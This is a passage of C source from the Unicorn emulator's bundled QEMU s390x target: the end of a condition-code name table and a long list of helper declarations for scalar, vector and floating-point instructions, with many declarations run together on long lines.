        [CC_OP_COMP_64] = "CC_OP_COMP_64",
        [CC_OP_TM_32] = "CC_OP_TM_32",
        [CC_OP_TM_64] = "CC_OP_TM_64",
        [CC_OP_NZ_F32] = "CC_OP_NZ_F32",
        [CC_OP_NZ_F64] = "CC_OP_NZ_F64",
        [CC_OP_NZ_F128] = "CC_OP_NZ_F128",
        [CC_OP_ICM] = "CC_OP_ICM",
        [CC_OP_SLA] = "CC_OP_SLA",
        [CC_OP_FLOGR] = "CC_OP_FLOGR",
        [CC_OP_LCBB] = "CC_OP_LCBB",
        [CC_OP_VC] = "CC_OP_VC",
    };

    return cc_names[cc_op];
}

unicorn-2.1.1/qemu/target/s390x/helper.h

DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64)
DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64)
DEF_HELPER_1(uc_s390x_exit, void, env)
DEF_HELPER_2(exception, noreturn, env, i32)
DEF_HELPER_2(data_exception, noreturn, env, i32)
DEF_HELPER_FLAGS_4(nc, TCG_CALL_NO_WG, i32, env, i32, i64, i64)
DEF_HELPER_FLAGS_4(oc, TCG_CALL_NO_WG, i32, env, i32, i64, i64)
DEF_HELPER_FLAGS_4(xc, TCG_CALL_NO_WG, i32, env, i32, i64, i64)
DEF_HELPER_FLAGS_4(mvc, TCG_CALL_NO_WG, void, env, i32, i64, i64)
DEF_HELPER_FLAGS_4(mvcin, TCG_CALL_NO_WG, void, env, i32, i64, i64)
DEF_HELPER_FLAGS_4(clc, TCG_CALL_NO_WG, i32, env, i32, i64, i64)
DEF_HELPER_3(mvcl, i32, env, i32, i32)
DEF_HELPER_3(clcl, i32, env, i32, i32)
DEF_HELPER_FLAGS_4(clm, TCG_CALL_NO_WG, i32, env, i32, i32, i64)
DEF_HELPER_FLAGS_3(divs32, TCG_CALL_NO_WG, s64, env, s64, s64)
DEF_HELPER_FLAGS_3(divu32, TCG_CALL_NO_WG, i64, env, i64, i64)
DEF_HELPER_FLAGS_3(divs64, TCG_CALL_NO_WG, s64, env, s64, s64)
DEF_HELPER_FLAGS_4(divu64, TCG_CALL_NO_WG, i64, env, i64, i64, i64)
DEF_HELPER_3(srst, void, env, i32, i32)
DEF_HELPER_3(srstu, void, env, i32, i32)
DEF_HELPER_4(clst, i64, env, i64, i64, i64)
DEF_HELPER_FLAGS_4(mvn, TCG_CALL_NO_WG, void, env, i32, i64, i64)
DEF_HELPER_FLAGS_4(mvo, TCG_CALL_NO_WG, void, env, i32, i64, i64)
DEF_HELPER_FLAGS_4(mvpg, TCG_CALL_NO_WG, i32, env, i64, i64, i64)
DEF_HELPER_FLAGS_4(mvz, TCG_CALL_NO_WG, void, env, i32, i64, i64)
DEF_HELPER_3(mvst, i32, env, i32, i32)
DEF_HELPER_4(ex, void, env, i32, i64, i64)
DEF_HELPER_FLAGS_4(stam, TCG_CALL_NO_WG, void, env, i32, i64, i32) DEF_HELPER_FLAGS_4(lam, TCG_CALL_NO_WG, void, env, i32, i64, i32) DEF_HELPER_4(mvcle, i32, env, i32, i64, i32) DEF_HELPER_4(mvclu, i32, env, i32, i64, i32) DEF_HELPER_4(clcle, i32, env, i32, i64, i32) DEF_HELPER_4(clclu, i32, env, i32, i64, i32) DEF_HELPER_3(cegb, i64, env, s64, i32) DEF_HELPER_3(cdgb, i64, env, s64, i32) DEF_HELPER_3(cxgb, i64, env, s64, i32) DEF_HELPER_3(celgb, i64, env, i64, i32) DEF_HELPER_3(cdlgb, i64, env, i64, i32) DEF_HELPER_3(cxlgb, i64, env, i64, i32) DEF_HELPER_4(cdsg, void, env, i64, i32, i32) DEF_HELPER_4(cdsg_parallel, void, env, i64, i32, i32) DEF_HELPER_4(csst, i32, env, i32, i64, i64) DEF_HELPER_4(csst_parallel, i32, env, i32, i64, i64) DEF_HELPER_FLAGS_3(aeb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(adb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_5(axb, TCG_CALL_NO_WG, i64, env, i64, i64, i64, i64) DEF_HELPER_FLAGS_3(seb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(sdb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_5(sxb, TCG_CALL_NO_WG, i64, env, i64, i64, i64, i64) DEF_HELPER_FLAGS_3(deb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(ddb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_5(dxb, TCG_CALL_NO_WG, i64, env, i64, i64, i64, i64) DEF_HELPER_FLAGS_3(meeb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(mdeb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(mdb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_5(mxb, TCG_CALL_NO_WG, i64, env, i64, i64, i64, i64) DEF_HELPER_FLAGS_4(mxdb, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_2(ldeb, TCG_CALL_NO_WG, i64, env, i64) DEF_HELPER_FLAGS_4(ldxb, TCG_CALL_NO_WG, i64, env, i64, i64, i32) DEF_HELPER_FLAGS_2(lxdb, TCG_CALL_NO_WG, i64, env, i64) DEF_HELPER_FLAGS_2(lxeb, TCG_CALL_NO_WG, i64, env, i64) DEF_HELPER_FLAGS_3(ledb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_4(lexb, TCG_CALL_NO_WG, i64, env, i64, i64, i32) DEF_HELPER_FLAGS_3(ceb, TCG_CALL_NO_WG_SE, i32, env, i64, i64) DEF_HELPER_FLAGS_3(cdb, TCG_CALL_NO_WG_SE, i32, env, i64, i64) DEF_HELPER_FLAGS_5(cxb, TCG_CALL_NO_WG_SE, i32, env, i64, i64, i64, i64) DEF_HELPER_FLAGS_3(keb, TCG_CALL_NO_WG, i32, env, i64, i64) DEF_HELPER_FLAGS_3(kdb, TCG_CALL_NO_WG, i32, env, i64, i64) DEF_HELPER_FLAGS_5(kxb, TCG_CALL_NO_WG, i32, env, i64, i64, i64, i64) DEF_HELPER_FLAGS_3(cgeb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_3(cgdb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_4(cgxb, TCG_CALL_NO_WG, i64, env, i64, i64, i32) DEF_HELPER_FLAGS_3(cfeb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_3(cfdb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_4(cfxb, TCG_CALL_NO_WG, i64, env, i64, i64, i32) DEF_HELPER_FLAGS_3(clgeb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_3(clgdb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_4(clgxb, TCG_CALL_NO_WG, i64, env, i64, i64, i32) DEF_HELPER_FLAGS_3(clfeb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_3(clfdb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_4(clfxb, TCG_CALL_NO_WG, i64, env, i64, i64, i32) DEF_HELPER_FLAGS_3(fieb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_3(fidb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_4(fixb, TCG_CALL_NO_WG, i64, env, i64, i64, i32) DEF_HELPER_FLAGS_4(maeb, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(madb, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(mseb, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(msdb, 
TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_3(tceb, TCG_CALL_NO_RWG_SE, i32, env, i64, i64) DEF_HELPER_FLAGS_3(tcdb, TCG_CALL_NO_RWG_SE, i32, env, i64, i64) DEF_HELPER_FLAGS_4(tcxb, TCG_CALL_NO_RWG_SE, i32, env, i64, i64, i64) DEF_HELPER_FLAGS_2(sqeb, TCG_CALL_NO_WG, i64, env, i64) DEF_HELPER_FLAGS_2(sqdb, TCG_CALL_NO_WG, i64, env, i64) DEF_HELPER_FLAGS_3(sqxb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_1(cvd, TCG_CALL_NO_RWG_SE, i64, s32) DEF_HELPER_FLAGS_4(pack, TCG_CALL_NO_WG, void, env, i32, i64, i64) DEF_HELPER_FLAGS_4(pka, TCG_CALL_NO_WG, void, env, i64, i64, i32) DEF_HELPER_FLAGS_4(pku, TCG_CALL_NO_WG, void, env, i64, i64, i32) DEF_HELPER_FLAGS_4(unpk, TCG_CALL_NO_WG, void, env, i32, i64, i64) DEF_HELPER_FLAGS_4(unpka, TCG_CALL_NO_WG, i32, env, i64, i32, i64) DEF_HELPER_FLAGS_4(unpku, TCG_CALL_NO_WG, i32, env, i64, i32, i64) DEF_HELPER_FLAGS_3(tp, TCG_CALL_NO_WG, i32, env, i64, i32) DEF_HELPER_FLAGS_4(tr, TCG_CALL_NO_WG, void, env, i32, i64, i64) DEF_HELPER_4(tre, i64, env, i64, i64, i64) DEF_HELPER_4(trt, i32, env, i32, i64, i64) DEF_HELPER_4(trtr, i32, env, i32, i64, i64) DEF_HELPER_5(trXX, i32, env, i32, i32, i32, i32) DEF_HELPER_4(cksm, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_5(calc_cc, TCG_CALL_NO_RWG_SE, i32, env, i32, i64, i64, i64) DEF_HELPER_FLAGS_2(sfpc, TCG_CALL_NO_WG, void, env, i64) DEF_HELPER_FLAGS_2(sfas, TCG_CALL_NO_WG, void, env, i64) DEF_HELPER_FLAGS_2(srnm, TCG_CALL_NO_WG, void, env, i64) DEF_HELPER_FLAGS_1(popcnt, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_2(stfle, i32, env, i64) DEF_HELPER_FLAGS_2(lpq, TCG_CALL_NO_WG, i64, env, i64) DEF_HELPER_FLAGS_2(lpq_parallel, TCG_CALL_NO_WG, i64, env, i64) DEF_HELPER_FLAGS_4(stpq, TCG_CALL_NO_WG, void, env, i64, i64, i64) DEF_HELPER_FLAGS_4(stpq_parallel, TCG_CALL_NO_WG, void, env, i64, i64, i64) DEF_HELPER_4(mvcos, i32, env, i64, i64, i64) DEF_HELPER_4(cu12, i32, env, i32, i32, i32) DEF_HELPER_4(cu14, i32, env, i32, i32, i32) DEF_HELPER_4(cu21, i32, env, i32, i32, i32) DEF_HELPER_4(cu24, i32, env, i32, i32, i32) DEF_HELPER_4(cu41, i32, env, i32, i32, i32) DEF_HELPER_4(cu42, i32, env, i32, i32, i32) DEF_HELPER_5(msa, i32, env, i32, i32, i32, i32) DEF_HELPER_FLAGS_1(stpt, TCG_CALL_NO_RWG, i64, env) DEF_HELPER_FLAGS_1(stck, TCG_CALL_NO_RWG_SE, i64, env) DEF_HELPER_FLAGS_3(probe_write_access, TCG_CALL_NO_WG, void, env, i64, i64) /* === Vector Support Instructions === */ DEF_HELPER_FLAGS_4(vll, TCG_CALL_NO_WG, void, env, ptr, i64, i64) DEF_HELPER_FLAGS_4(gvec_vpk16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vpk32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vpk64, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vpks16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vpks32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vpks64, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_5(gvec_vpks_cc16, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vpks_cc32, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vpks_cc64, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vpkls16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vpkls32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vpkls64, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_5(gvec_vpkls_cc16, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vpkls_cc32, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vpkls_cc64, void, ptr, cptr, cptr, env, i32) 
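/*
 * Naming sketch, inferred from the declarations rather than stated by the
 * authors: the numeric suffix on each gvec helper is the element width in
 * bits, so gvec_vpks16 packs 16-bit elements and gvec_vpks64 packs 64-bit
 * ones. Variants declared TCG_CALL_NO_RWG touch only their vector operand
 * buffers, while the _cc variants also receive env because they must set
 * the condition code as a side effect.
 */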
DEF_HELPER_FLAGS_5(gvec_vperm, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(vstl, TCG_CALL_NO_WG, void, env, cptr, i64, i64) /* === Vector Integer Instructions === */ DEF_HELPER_FLAGS_4(gvec_vavg8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vavg16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vavgl8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vavgl16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_3(gvec_vclz8, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_FLAGS_3(gvec_vclz16, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_FLAGS_3(gvec_vctz8, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_FLAGS_3(gvec_vctz16, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vgfm8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vgfm16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vgfm32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vgfm64, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vgfma8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vgfma16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vgfma32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vgfma64, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmal8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmal16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmah8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmah16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmalh8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmalh16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmae8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmae16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmae32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmale8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmale16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmale32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmao8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmao16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmao32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmalo8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmalo16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmalo32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmh8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmh16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmlh8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmlh16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vme8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vme16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vme32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmle8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) 
DEF_HELPER_FLAGS_4(gvec_vmle16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmle32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmo8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmo16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmo32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmlo8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmlo16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmlo32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_3(gvec_vpopct8, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_FLAGS_3(gvec_vpopct16, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_verllv8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_verllv16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_verll8, TCG_CALL_NO_RWG, void, ptr, cptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_verll16, TCG_CALL_NO_RWG, void, ptr, cptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_verim8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_verim16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vsl, TCG_CALL_NO_RWG, void, ptr, cptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_vsra, TCG_CALL_NO_RWG, void, ptr, cptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_vsrl, TCG_CALL_NO_RWG, void, ptr, cptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_vscbi8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vscbi16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_4(gvec_vtm, void, ptr, cptr, env, i32) /* === Vector String Instructions === */ DEF_HELPER_FLAGS_4(gvec_vfae8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vfae16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vfae32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_5(gvec_vfae_cc8, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfae_cc16, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfae_cc32, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vfee8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vfee16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vfee32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_5(gvec_vfee_cc8, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfee_cc16, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfee_cc32, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vfene8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vfene16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vfene32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_5(gvec_vfene_cc8, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfene_cc16, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfene_cc32, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_3(gvec_vistr8, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_FLAGS_3(gvec_vistr16, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_FLAGS_3(gvec_vistr32, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_4(gvec_vistr_cc8, void, ptr, cptr, env, i32) DEF_HELPER_4(gvec_vistr_cc16, void, ptr, cptr, env, i32) DEF_HELPER_4(gvec_vistr_cc32, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vstrc8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vstrc16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vstrc32, TCG_CALL_NO_RWG, void, ptr, 
cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vstrc_rt8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vstrc_rt16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vstrc_rt32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_6(gvec_vstrc_cc8, void, ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_6(gvec_vstrc_cc16, void, ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_6(gvec_vstrc_cc32, void, ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_6(gvec_vstrc_cc_rt8, void, ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_6(gvec_vstrc_cc_rt16, void, ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_6(gvec_vstrc_cc_rt32, void, ptr, cptr, cptr, cptr, env, i32) /* === Vector Floating-Point Instructions === */ DEF_HELPER_FLAGS_5(gvec_vfa64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfa64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_4(gvec_wfc64, void, cptr, cptr, env, i32) DEF_HELPER_4(gvec_wfk64, void, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfce64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfce64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfce64_cc, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfce64s_cc, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfch64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfch64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfch64_cc, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfch64s_cc, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfche64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfche64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfche64_cc, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfche64s_cc, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vcdg64, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vcdg64s, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vcdlg64, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vcdlg64s, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vcgd64, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vcgd64s, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vclgd64, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vclgd64s, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfd64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfd64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vfi64, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vfi64s, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vfll32, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vfll32s, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vflr64, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vflr64s, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfm64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfm64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_6(gvec_vfma64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_6(gvec_vfma64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_6(gvec_vfms64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, cptr, env, i32)
